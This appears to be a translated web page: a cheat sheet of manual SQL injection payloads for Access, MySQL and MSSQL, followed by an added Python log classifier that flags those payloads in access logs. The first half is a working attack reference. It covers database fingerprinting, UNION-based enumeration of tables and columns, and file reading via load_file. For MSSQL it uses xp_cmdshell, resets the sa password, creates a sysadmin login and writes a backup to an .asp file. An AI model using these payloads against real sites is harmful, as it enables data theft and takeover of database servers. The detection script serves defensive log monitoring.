Manually injecting common SQL statements

Source: Internet
Author: User
Tags: explode, mssql, ord

To determine the database type:

Access:
and (select ID from msysaccessobjects)>0
If the page returns normally, the database is Access.

MSSQL:
and (select ID from sysobjects)>0
If the page returns normally, the database is MSSQL.

MySQL:
and length(user())>0
If the page returns normally, the database is MySQL.


MySQL:

1. Determine the version: ord(mid(version(),plus))>51/*  If the page returns normally, the version is 4.0 or higher and a union query can be used.
2. Use ORDER BY to find the number of fields: append order by 10/* to the URL; if the page returns normally, there are more than 10 fields.
3. Use UNION to find the exact number of fields, e.g. order by or and 1=2 union select 1,2,3,....../* until the page returns normally, which gives the exact field count. If spaces are filtered they can be replaced with /**/.
4. Determine whether the database connection account has write permission: and (select count(*) from mysql.user)>0/*  If this returns an error, we can only guess the administrator account and password.
5. If it returns normally, you can use 1=2 union select 1,2,3,4,5,6,load_file(char(ASCII values of the file path, separated by commas)),8,9,10/*  Note: load_file(char(ASCII values of the file path, separated by commas)) can also be written in hexadecimal; it is used to read configuration files, locate the database connection details, and so on.

6. Detect whether the account is root: and/**/ord(mid(user(),1,1))=114/*

7. The MySQL built-in function hex() converts a string to hexadecimal, e.g. select hex(user())
   The MySQL built-in function unhex() decodes hexadecimal, e.g. select unhex(hex(user()))

8. The MySQL built-in function concat() merges multiple columns into one column, e.g. select concat(username,0x3a,password) from t_member

9. Commonly used built-in functions:
select system_user()         shows the system user
select current_user()        shows the current user
select user()                shows the user
select version()             shows the database version
select database()            shows the currently connected database
select @@version_compile_os  shows the current operating system
select @@datadir             shows the database data path
select @@basedir             shows the MySQL installation path

---------------------- Divider ---------------------------------------------

Use LIMIT to step through all rows: the first number is the row to start from, the second is how many rows a single query returns.
Increment the first number from 1; when the browser returns an error at 3, there are 2 databases/tables.

10. Query the number of databases:
union select concat(schema_name,0x3a) from information_schema.schemata limit


11. Query the tables:
union select table_name from information_schema.tables where table_schema=library name limit


MSSQL:

Detect whether the account has SA privileges:
and 1=(select is_srvrolemember('sysadmin'));--

Detect whether the account has db_owner privileges:
and 1=(select is_member('db_owner'))

Enumerate all databases: union select name from master.dbo.sysdatabases where dbid=1   (1 means the first database)

Enumerate all tables:
First table:  union select top 1 name from library name.dbo.sysobjects where xtype='U'

Second table: union select top 1 name from library name.dbo.sysobjects where xtype='U' and name not in ('first table')

Third table:  union select top 1 name from library name.dbo.sysobjects where xtype='U' and name not in ('first table','second table')
...


Enumerate columns:
Get the table ID:  select ID from seay.dbo.sysobjects where xtype='U' and name='admin'

First column:  select top 1 name from seay.dbo.syscolumns where id=ID number

Second column: select top 1 name from seay.dbo.syscolumns where id=ID number and name not in ('first column')
...


Enumerate data:
select column name from table name


exec master.dbo.xp_dirtree 'C:\';  -- traverse a directory
exec master.dbo.xp_availablemedia;  -- get all current drives
exec master.dbo.xp_subdirs 'c:\';  -- get the list of subdirectories
exec master.dbo.xp_dirtree 'C:';  -- get the directory tree of all subdirectories
exec master.dbo.xp_cmdshell 'type c:\web\web.config';  -- view the contents of a file

Back up the database: backup library name to disk='c:/l.asp';


MSSQL built-in functions:
select @@version   shows the database version

select user_name()  shows the current database connection user name

select db_name()    shows the current database name


Change the sa password:
exec sp_password NULL,'new password','sa'


Add a user with SA privileges:
exec sp_addlogin 'username','pass','master';
exec sp_addsrvrolemember 'username',sysadmin

Detect whether multiple statements (stacked queries) are supported:
;declare @d int;--


Stop or start a service:

exec master.xp_servicecontrol 'stop','schedule'
exec master.xp_servicecontrol 'start','schedule'


Unpack a cab file:

xp_unpackcab 'C:\test.cab','C:\Temp',1

Restore xp_cmdshell:
;exec master.dbo.sp_addextendedproc 'xp_cmdshell','xplog70.dll';--


To turn on sandbox mode:
exec master.xp_regwrite 'HKEY_LOCAL_MACHINE','Software\Microsoft\Jet\4.0\Engines','SandboxMode','REG_DWORD',1
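The statements above are exactly what shows up in web server logs while an injection is being probed. The following is an added example, not part of the original page: a small log classifier that URL-decodes each request, undoes the /**/ space substitution mentioned in the MySQL section, and tags lines that carry the fingerprinting, enumeration, privilege-check, or file/OS fragments listed above. The log lines are constructed for the example.

```python
import re
from urllib.parse import unquote_plus

# Constructed access-log lines (not from the page); line 1 and 5 are benign.
SAMPLE_LOG = [
    '10.0.0.5 - - "GET /news.php?id=12 HTTP/1.1" 200',
    '10.0.0.7 - - "GET /news.php?id=12%20and%20(select%20ID%20from%20sysobjects)%3E0 HTTP/1.1" 200',
    '10.0.0.7 - - "GET /news.php?id=12/**/and/**/ord(mid(user(),1,1))=114/* HTTP/1.1" 200',
    '10.0.0.9 - - "GET /item.asp?id=3;exec%20master.dbo.xp_cmdshell%20%27dir%27-- HTTP/1.1" 500',
    '10.0.0.5 - - "GET /search.php?q=information HTTP/1.1" 200',
]

# Fragments taken from the cheat sheet above, grouped by the phase they belong to.
SIGNATURES = [
    ("fingerprint", re.compile(r"\bfrom\s+(msysaccessobjects|sysobjects)\b")),
    ("fingerprint", re.compile(r"\blength\s*\(\s*user\s*\(\s*\)\s*\)")),
    ("fingerprint", re.compile(r"\bord\s*\(\s*mid\s*\(\s*(version|user)\s*\(")),
    ("enumerate", re.compile(r"\border\s+by\s+\d+")),
    ("enumerate", re.compile(r"\bunion\s+select\b")),
    ("enumerate", re.compile(r"\binformation_schema\.(schemata|tables|columns)\b")),
    ("enumerate", re.compile(r"\b(sysdatabases|syscolumns)\b")),
    ("privilege", re.compile(r"\b(is_srvrolemember|is_member)\s*\(")),
    ("privilege", re.compile(r"\bfrom\s+mysql\.user\b")),
    ("file/os", re.compile(r"\bload_file\s*\(")),
    ("file/os", re.compile(r"\bxp_(cmdshell|dirtree|subdirs|availablemedia|regwrite|servicecontrol)\b")),
    ("file/os", re.compile(r"\bsp_(addextendedproc|addlogin|addsrvrolemember|password)\b")),
]

REQUEST_RE = re.compile(r'"(?:GET|POST)\s+(\S+)')

def normalise(target: str) -> str:
    # Decode percent-encoding, turn the /**/ space substitute back into spaces,
    # collapse whitespace and lower-case so the signatures match despite obfuscation.
    text = unquote_plus(target).replace("/**/", " ")
    return re.sub(r"\s+", " ", text).lower()

def classify(line: str) -> list[str]:
    # Return the sorted set of attack-phase tags matched by the request target.
    m = REQUEST_RE.search(line)
    if not m:
        return []
    target = normalise(m.group(1))
    return sorted({tag for tag, rx in SIGNATURES if rx.search(target)})

def suspicious_lines(lines):
    return [(line, tags) for line in lines if (tags := classify(line))]

if __name__ == "__main__":
    for line, tags in suspicious_lines(SAMPLE_LOG):
        print(",".join(tags), "|", line)
```

The tags are meant to feed an alert rule: a single fingerprint hit from one client is noise, while fingerprint followed by enumerate and file/os from the same address is the full progression the cheat sheet describes.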

